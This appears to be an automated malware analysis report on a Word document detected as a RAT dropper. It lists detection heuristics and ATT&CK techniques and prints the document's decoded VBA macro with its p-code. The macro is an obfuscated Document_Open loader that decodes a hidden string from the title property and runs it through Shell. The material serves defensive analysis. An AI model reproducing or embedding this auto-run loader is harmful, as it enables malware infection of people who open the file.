MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro that is triggered by the Document_Open event. This macro decodes a string and uses the Shell() function to execute it, likely downloading and running a second-stage payload. The ClamAV detection name 'Doc.Dropper.ImminentMonitorRAT-10018167-0' further supports its nature as a dropper.
Heuristics 8
-
ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ltrbknyfz = StrConv(karsri, vbUnicode) Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le") -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x61 bytes
Disassembly
Attempted x86 opcode disassembly00004708 61 popal 00004709 61 popal 0000470A 61 popal 0000470B 61 popal 0000470C 61 popal 0000470D 61 popal 0000470E 61 popal 0000470F 61 popal 00004710 61 popal 00004711 61 popal 00004712 61 popal 00004713 61 popal 00004714 61 popal 00004715 61 popal 00004716 61 popal 00004717 61 popal 00004718 61 popal 00004719 61 popal 0000471A 61 popal 0000471B 61 popal 0000471C 61 popal 0000471D 61 popal 0000471E 61 popal 0000471F 61 popal 00004720 61 popal 00004721 61 popal 00004722 61 popal 00004723 61 popal 00004724 61 popal 00004725 61 popal 00004726 61 popal 00004727 61 popal 00004728 61 popal 00004729 61 popal 0000472A 61 popal 0000472B 61 popal 0000472C 61 popal 0000472D 61 popal 0000472E 61 popal 0000472F 61 popal 00004730 61 popal 00004731 61 popal 00004732 61 popal 00004733 61 popal 00004734 61 popal 00004735 61 popal 00004736 61 popal 00004737 61 popal 00004738 61 popal 00004739 61 popal 0000473A 61 popal 0000473B 61 popal 0000473C 61 popal 0000473D 61 popal 0000473E 61 popal 0000473F 61 popal 00004740 61 popal 00004741 61 popal 00004742 61 popal 00004743 61 popal 00004744 61 popal 00004745 61 popal 00004746 61 popal 00004747 61 popal 00004748 61 popal 00004749 61 popal 0000474A 61 popal 0000474B 61 popal 0000474C 61 popal 0000474D 61 popal 0000474E 61 popal 0000474F 61 popal 00004750 61 popal 00004751 61 popal 00004752 61 popal 00004753 61 popal 00004754 61 popal 00004755 61 popal 00004756 61 popal 00004757 61 popal 00004758 61 popal 00004759 61 popal 0000475A 61 popal 0000475B 61 popal 0000475C 61 popal 0000475D 61 popal 0000475E 61 popal 0000475F 61 popal 00004760 61 popal 00004761 61 popal 00004762 61 popal 00004763 61 popal 00004764 61 popal 00004765 61 popal 00004766 61 popal 00004767 61 popal
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2733 bytes |
SHA-256: e4fab99b1e601be23aea38196e337d6138c32ba2df684e6edf3c1bb9c08b521c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
Dim ltrbknyfz As String
Dim shmoo As String
shmoo = StrReverse(efsv)
Dim karsri() As Byte
karsri = StrConv(shmoo, vbFromUnicode)
Dim tdqdokgvtdus As Long
For tdqdokgvtdus = 0 To UBound(karsri)
karsri(tdqdokgvtdus) = karsri(tdqdokgvtdus) - 9 + 2
Next tdqdokgvtdus
ltrbknyfz = StrConv(karsri, vbUnicode)
Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
' Processing file: /tmp/qstore_whyi1s96
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4190 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' LitStr 0x0003 "Tit"
' LitStr 0x0002 "le"
' Add
' Ld ThisDocument
' ArgsMemLd BuiltInDocumentProperties 0x0001
' St hlitb
' Line #2:
' Dim
' VarDefn efsv (As String)
' Line #3:
' Dim
' VarDefn ltrbknyfz (As String)
' Line #4:
' Ld hlitb
' ArgsLd StrReverse 0x0001
' St ltrbknyfz
' Line #5:
' Dim
' VarDefn shmoo (As Byte)
' Line #6:
' Ld ltrbknyfz
' Ld vbFromUnicode
' ArgsLd StrConv 0x0002
' St shmoo
' Line #7:
' Dim
' VarDefn karsri (As Long)
' Line #8:
' StartForVariable
' Ld karsri
' EndForVariable
' LitDI2 0x0000
' Ld shmoo
' FnUBound 0x0000
' For
' Line #9:
' Ld karsri
' ArgsLd shmoo 0x0001
' LitDI2 0x0009
' Sub
' LitDI2 0x0002
' Add
' Ld karsri
' ArgsSt shmoo 0x0001
' Line #10:
' StartForVariable
' Ld karsri
' EndForVariable
' NextVar
' Line #11:
' Ld shmoo
' Ld vbUnicode
' ArgsLd StrConv 0x0002
' St efsv
' Line #12:
' LitDI2 0x0001
' Ld efsv
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x0000
' Ld efsv
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' ArgsLd Replace 0x0003
' LitStr 0x0002 "FP"
' LitStr 0x0003 "ATH"
' Add
' Ld ActiveDocument
' MemLd path
' Ld Application
' MemLd PathSeparator
' Concat
' Ld ActiveDocument
' MemLd Name
' Concat
' ArgsLd Replace 0x0003
' Paren
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #13:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.